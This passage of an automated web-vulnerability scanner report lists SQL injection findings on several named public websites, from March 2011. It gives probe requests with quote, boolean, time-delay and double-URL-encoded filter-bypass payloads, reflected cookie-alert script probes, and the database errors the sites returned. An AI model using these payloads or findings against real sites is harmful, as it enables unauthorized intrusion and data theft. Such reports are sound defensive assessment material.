The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /xss-cross-site-scripting.html HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:17:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html
Content-Length: 171

Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''',now())' at line 1

Request 2

GET /xss-cross-site-scripting.html HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:17:45 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=ekmcdkcg13ud5h14ihlihqluh7; path=/
Connection: close
Content-Type: text/html
Content-Length: 23775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...
1.129. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /xss-cross-site-scripting.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /xss-cross-site-scripting.html?1'=1 HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:17:31 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=ajfnsvrm911se886mn7ea890n5; path=/
Connection: close
Content-Type: text/html
Content-Length: 7658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...
</strong>
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and link1.deleted = 0 and link2.deleted = 0 and link_cache.deleted = 0' at line 1

Request 2

GET /xss-cross-site-scripting.html?1''=1 HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:17:32 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=togl5l07b0ch6huifhi2p77eu3; path=/
Connection: close
Content-Type: text/html
Content-Length: 22921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...
1.130. http://www.phpbuilder.com/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.phpbuilder.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Request

GET /?7640d--%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: www.phpbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=')waitfor%20delay'0%3a0%3a20'--

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:19:21 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Mar 2011 16:20:21 GMT
Connection: close
Content-Type: text/html
Content-Length: 72906


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <title>PHPBuilder.com, the best reso
...[SNIP]...
<a href="/columns/linuxjournal200009.php3">Serious Web Applications With PHP & PostgreSQL</a>
...[SNIP]...
1.131. http://www.phpbuilder.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.phpbuilder.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload " was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Request

GET /?1"=1 HTTP/1.1
Host: www.phpbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:18:59 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Mar 2011 16:19:59 GMT
Connection: close
Content-Type: text/html
Content-Length: 72625


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <title>PHPBuilder.com, the best reso
...[SNIP]...
<a href="/columns/tim20000705.php3">MySQL and PostgreSQL Compared</a>
...[SNIP]...
1.132. http://www.phpbuilder.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phpbuilder.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /?7640d--%3E%3Cscript%3Ealert(document.cookie&1%2527=1 HTTP/1.1
Host: www.phpbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 16:48:28 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 25 Mar 2011 16:49:28 GMT
Connection: close
Content-Type: text/html
Content-Length: 72657


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <title>PHPBuilder.com, the best reso
...[SNIP]...
<a href="/columns/tim20000705.php3">MySQL and PostgreSQL Compared</a>
...[SNIP]...

Request 2

GET /?7640d--%3E%3Cscript%3Ealert(document.cookie&1%2527%2527=1 HTTP/1.1
Host: www.phpbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 16:48:28 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 25 Mar 2011 16:49:28 GMT
Connection: close
Content-Type: text/html
Content-Length: 72622


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <title>PHPBuilder.com, the best reso
...[SNIP]...
1.133. http://www.prevention.com/cda/toolfinder.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.prevention.com
Path:   /cda/toolfinder.do

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cda/toolfinder.do?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Cache-Control: max-age=1800
Date: Fri, 18 Mar 2011 16:20:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61452


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<head>
   
...[SNIP]...
<scri' + 'pt type="text/javascript" language="JavaScript" src="http://ad.doubleclick.net/adj/' + siteName + '/newsvoices;' + rasegs + ';topic=' + topic + ';sbtpc=' + sbtpc + ';cat=' + cat + ';kw=;tile=' + tile++ + ';slot=294x42.1;sz=294x42;ord=' + ord + '?" type="text/javascript">');
       document.writeln('</scri' + 'pt>');
    // ]]>
   // end hide from browsers --> </script>
   <noscript><A HREF="http://ad.doubleclick.net/jump/prevention/newsvoices;topic=In This Issuee;sbtpc=In This Issue;cat=;kw=;tile=1;slot=294x42.1;sz=294x42;ord=123456?" TARGET="_blank"><IMG SRC="http://ad.doubleclick.net/ad/prevention/newsvoices;topic=In This Issuee;sbtpc=In This Issue;cat=;kw=;tile=1;slot=294x42.1;sz=294x42;ord=123456?" BORDER="0" ALT="" HEIGHT="42" WIDTH="294"/></A></noscript>


   







       </div>
           

   
</div>

</div>
   <!-- END Mast -->



   <!-- START Topnav -->
   <!-- ## Div tag around each nav image is needed to fix space issues in IE ## -->

   
       

<div id="brWrap">

<!-- START Topnav -->

       
   
       
       
       
   <!-- ## Div tag around each nav image is needed to fix space issues in IE ## -->
    <div id="navBar"
    xmlns:fo="http://www.w3.org/1999/XSL/Format">
    <ul id="topNav">

                   <!-- "Home" nav -->
                   <li class="first">
                       <a href="http://www.prevention.com/health/" target="_top" tabindex="1" class="home">HOME</a>
                   </li>
                   
                   
                   
                   
                       
                       
                       
                   <!-- hightlight the channel nav if it is the current channel -->
                   
                       <li>
                       
                       <a href="http://www.prevention.com/health/health" target="_top" title="Health" class="health" tabindex="2">HEALTH</a>
                       </li>
                       
                   
                       
                       
                       
                   <!-- hightlight the channel nav if it is the current channel -->
                   
                       <li>
                       
                       <a href="http://www.prevention.com/health/weight-loss" target="_top" title="Weight Loss" class="weight loss" tabindex="3">WEIGHT LOSS</a>
                       </li>
                       
                   
                       
                       
                       
                   <!-- hightlight the channel nav if it is the
...[SNIP]...

Request 2

GET /cda/toolfinder.do?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Cache-Control: max-age=1800
Date: Fri, 18 Mar 2011 16:20:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60067


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<head>
   
...[SNIP]...
<scri' + 'pt type="text/javascript" language="JavaScript" src="http://ad.doubleclick.net/adj/' + siteName + '/newsletters;' + rasegs + ';topic=' + topic + ';sbtpc=' + sbtpc + ';cat=' + cat + ';kw=;tile=' + tile++ + ';slot=294x42.1;sz=294x42;ord=' + ord + '?" type="text/javascript">');
       document.writeln('</scri' + 'pt>');
    // ]]>
   // end hide from browsers --> </script>
   <noscript><A HREF="http://ad.doubleclick.net/jump/prevention/newsletters;topic=;sbtpc=;cat=;kw=;tile=1;slot=294x42.1;sz=294x42;ord=123456?" TARGET="_blank"><IMG SRC="http://ad.doubleclick.net/ad/prevention/newsletters;topic=;sbtpc=;cat=;kw=;tile=1;slot=294x42.1;sz=294x42;ord=123456?" BORDER="0" ALT="" HEIGHT="42" WIDTH="294"/></A></noscript>


   







       </div>
           

   
</div>

</div>
   <!-- END Mast -->



   <!-- START Topnav -->
   <!-- ## Div tag around each nav image is needed to fix space issues in IE ## -->

   
       

<div id="brWrap">

<!-- START Topnav -->

       
   
       
       
       
   <!-- ## Div tag around each nav image is needed to fix space issues in IE ## -->
    <div id="navBar"
    xmlns:fo="http://www.w3.org/1999/XSL/Format">
    <ul id="topNav">

                   <!-- "Home" nav -->
                   <li class="first">
                       <a href="http://www.prevention.com/health/" target="_top" tabindex="1" class="home">HOME</a>
                   </li>
                   
                   
                   
                   
                       
                       
                       
                   <!-- hightlight the channel nav if it is the current channel -->
                   
                       <li>
                       
                       <a href="http://www.prevention.com/health/health" target="_top" title="Health" class="health" tabindex="2">HEALTH</a>
                       </li>
                       
                   
                       
                       
                       
                   <!-- hightlight the channel nav if it is the current channel -->
                   
                       <li>
                       
                       <a href="http://www.prevention.com/health/weight-loss" target="_top" title="Weight Loss" class="weight loss" tabindex="3">WEIGHT LOSS</a>
                       </li>
                       
                   
                       
                       
                       
                   <!-- hightlight the channel nav if it is the current channel -->
                   
                       <li>
                       
       
...[SNIP]...
1.134. http://www.slackbooks.com/essentialknee [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /essentialknee

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request 1

GET /essentialknee' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 18 Mar 2011 16:24:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10019

<html>
<head>
<title>Unclosed quotation mark before the character string 'essentialknee''.<br>Line 1: Incorrect syntax near 'essentialknee''.</title>
<style>
body {fon
...[SNIP]...

Request 2

GET /essentialknee'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Fri, 18 Mar 2011 16:24:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wjan3lrt1tzvkt45ygfq3fyw; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11938


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...
1.135. http://www.slackbooks.com/essentialknee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /essentialknee

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request 1

GET /essentialknee?1'=1 HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 18 Mar 2011 16:24:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9884

<html>
<head>
<title>Line 1: Incorrect syntax near '='.<br>Unclosed quotation mark before the character string ''.</title>
<style>
body {font-family:"Verdana";font-wei
...[SNIP]...

Request 2

GET /essentialknee?1''=1 HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Fri, 18 Mar 2011 16:24:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=k1h22hnphd0xgw550u0i0u55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11952


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...
1.136. http://www.slackbooks.com/orthopedics [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /orthopedics

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request 1

GET /orthopedics' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 18 Mar 2011 16:24:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9999

<html>
<head>
<title>Unclosed quotation mark before the character string 'orthopedics''.<br>Line 1: Incorrect syntax near 'orthopedics''.</title>
<style>
body {font-fa
...[SNIP]...

Request 2

GET /orthopedics'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Fri, 18 Mar 2011 16:24:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=hup5s345prehnsykvmjirqmq; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11930


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...
1.137. http://www.smartmoney.com/investing/etfsaa2c4'-alert(document.cookie)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.smartmoney.com
Path:   /investing/etfsaa2c4'-alert(document.cookie)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 52352249'%20or%201%3d1--%20 and 52352249'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /investing/etfsaa2c4'-alert(document.cookie)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/ HTTP/1.1
Host: www.smartmoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)52352249'%20or%201%3d1--%20
Connection: close

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Mar 2011 16:27:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: NEWSMIUSER=E1EA67D1%2DF713%2D215A%2D3D3BD08057744793;domain=.smartmoney.com;expires=Sun, 10-Mar-2041 16:27:04 GMT;path=/
Set-Cookie: REFRESH=;domain=.smartmoney.com;expires=Thu, 18-Mar-2010 16:27:04 GMT;path=/
Set-Cookie: REFRESH=;domain=.smartmoney.com;expires=Thu, 18-Mar-2010 16:27:04 GMT;path=/
Set-Cookie: ISFINADVISE=%2D1;domain=.smartmoney.com;path=/
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: NSC_tnz-xxx-iuuq=ffffffff09f93b8c45525d5f4f58455e445a4a423660;expires=Fri, 18-Mar-2011 16:37:01 GMT;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

   
   
...[SNIP]...
<script>var lqToken='5E66F8E33CDDF9159E57081FC9AD3F44';var lqData='*26.999|0.129,27.076|0.138,25.46|0.18,50.6186|0.3486,*128.371|1.074';useNLS=1;tickers='QAI,MCRO,MNA,ALT,SPY';</script>
   <script>document.write('<span id="stocktip"></span>');</script>
   <style type="text/css">#stocktip{z-index:5000;border:1px solid #666;background-color:#D0D7DF;padding:2px;display:none;position:absolute;top:250px;left:50px;width:205px;min-height:240px;}</style>
   <script language="JavaScript1.2" src="/shared/xmlhttp.js" type="text/javascript"></script>
   </head>
<body>

<div id="smWell">
   
<!-- Investing, ETFs -->


<!-- simulate these variables being set on actual wsj site -->
<script type='text/javascript'>
   var baseDomain = "http://www.smartmoney.com"
   var loggedIn = true;
   window.currentRegion = "na,us";
</script>

       <script type="text/javascript" src="http://c.wsj.net/dynamic/hat/hatloader3.js"></script>
   

   
   <div id="hat_div" class="hat_sm">
       <div id="hat_logo"></div>
       <ul class="hat_tabs">
           <li id="hat_tab1" class="hat_tab" onmouseover="hat.tabover(this)" onmouseout="hat.tabout(this)">
               <a id="hat_link1" href="http://online.wsj.com/home" onclick="hat.track('WSJ')"></a>
           </li>
           <li id="hat_tab2" class="hat_tab" onmouseover="hat.tabover(this)" onmouseout="hat.tabout(this)">
               <a id="hat_link2" href="http://www.marketwatch.com" onclick="hat.track('MW')"></a>
           </li>
           <li id="hat_tab3" class="hat_tab" onmouseover="hat.tabover(this)" onmouseout="hat.tabout(this)">
               <a id="hat_link3" href="http://online.barrons.com/home" onclick="hat.track('BOL')"></a>
           </li>
           <li id="hat_tab4" class="hat_tab" onmouseover="hat.tabover(this)" onmouseout="hat.tabout(this)">
               <a id="hat_link4" href="http://allthingsd.com" onclick="hat.track('ATD')"></a>
           </li>
           <li id="hat_tab6" class="hat_tabsel" onmouseover="hat.tabover(this)" onmouseout="hat.tabout(this)">
               <a id="hat_link6" href="http://www.smartmoney.com" onclick="hat.track('SM')"></a>
           </li>
           <li id="hat_tab5" class="hat_tab" onmouseover="hat.moremenu()" onmouseout="hat.moremenuhide()">
               <spa
...[SNIP]...

Request 2

GET /investing/etfsaa2c4'-alert(document.cookie)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/ HTTP/1.1
Host: www.smartmoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)52352249'%20or%201%3d2--%20
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Mar 2011 16:27:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: NEWSMIUSER=E1EA763C%2D904A%2DD08A%2DC1C80189EAF85CFF;domain=.smartmoney.com;expires=Sun, 10-Mar-2041 16:27:04 GMT;path=/
Set-Cookie: REFRESH=;domain=.smartmoney.com;expires=Thu, 18-Mar-2010 16:27:04 GMT;path=/
Set-Cookie: REFRESH=;domain=.smartmoney.com;expires=Thu, 18-Mar-2010 16:27:04 GMT;path=/
Set-Cookie: ISFINADVISE=%2D1;domain=.smartmoney.com;path=/
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: NSC_tnz-xxx-iuuq=ffffffff09f93b8c45525d5f4f58455e445a4a423660;expires=Fri, 18-Mar-2011 16:37:02 GMT;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

   
   
...[SNIP]...
<script>var lqToken='5E66F8E33CDDF9159E57081FC9AD3F44';var lqData='*26.999|0.129,27.076|0.138,25.46|0.18,50.6186|0.3486,*128.37|1.073';useNLS=1;tickers='QAI,MCRO,MNA,ALT,SPY';</script>
   <script>document.write('<span id="stocktip"></span>');</script>
   <style type="text/css">#stocktip{z-index:5000;border:1px solid #666;background-color:#D0D7DF;padding:2px;display:none;position:absolute;top:250px;left:50px;width:205px;min-height:240px;}</style>
   <script language="JavaScript1.2" src="/shared/xmlhttp.js" type="text/javascript"></script>
   </head>
<body>

<div id="smWell">
   
<!-- Investing, ETFs -->


<!-- simulate these variables being set on actual wsj site -->
<script type='text/javascript'>
   var baseDomain = "http://www.smartmoney.com"
   var loggedIn = true;
   window.currentRegion = "na,us";
</script>

       <script type="text/javascript" src="http://c.wsj.net/dynamic/hat/hatloader3.js"></script>
   

   
   <div id="hat_div" class="hat_sm">
       <div id="hat_logo"></div>
       <ul class="hat_tabs">
           <li id="hat_tab1" class="hat_tab" onmouseover="hat.tabover(this)" onmouseout="hat.tabout(this)">
               <a id="hat_link1" href="http://online.wsj.com/home" onclick="hat.track('WSJ')"></a>
           </li>
           <li id="hat_tab2" class="hat_tab" onmouseover="hat.tabover(this)" onmouseout="hat.tabout(this)">
               <a id="hat_link2" href="http://www.marketwatch.com" onclick="hat.track('MW')"></a>
           </li>
           <li id="hat_tab3" class="hat_tab" onmouseover="hat.tabover(this)" onmouseout="hat.tabout(this)">
               <a id="hat_link3" href="http://online.barrons.com/home" onclick="hat.track('BOL')"></a>
           </li>
           <li id="hat_tab4" class="hat_tab" onmouseover="hat.tabover(this)" onmouseout="hat.tabout(this)">
               <a id="hat_link4" href="http://allthingsd.com" onclick="hat.track('ATD')"></a>
           </li>
           <li id="hat_tab6" class="hat_tabsel" onmouseover="hat.tabover(this)" onmouseout="hat.tabout(this)">
               <a id="hat_link6" href="http://www.smartmoney.com" onclick="hat.track('SM')"></a>
           </li>
           <li id="hat_tab5" class="hat_tab" onmouseover="hat.moremenu()" onmouseout="hat.moremenuhide()">
               <span
...[SNIP]...
1.138. http://www.thecounter.com/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.thecounter.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 19067695'%20or%201%3d1--%20 and 19067695'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?6955f--%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: www.thecounter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=19067695'%20or%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:29:08 GMT
Server: Apache
Connection: close
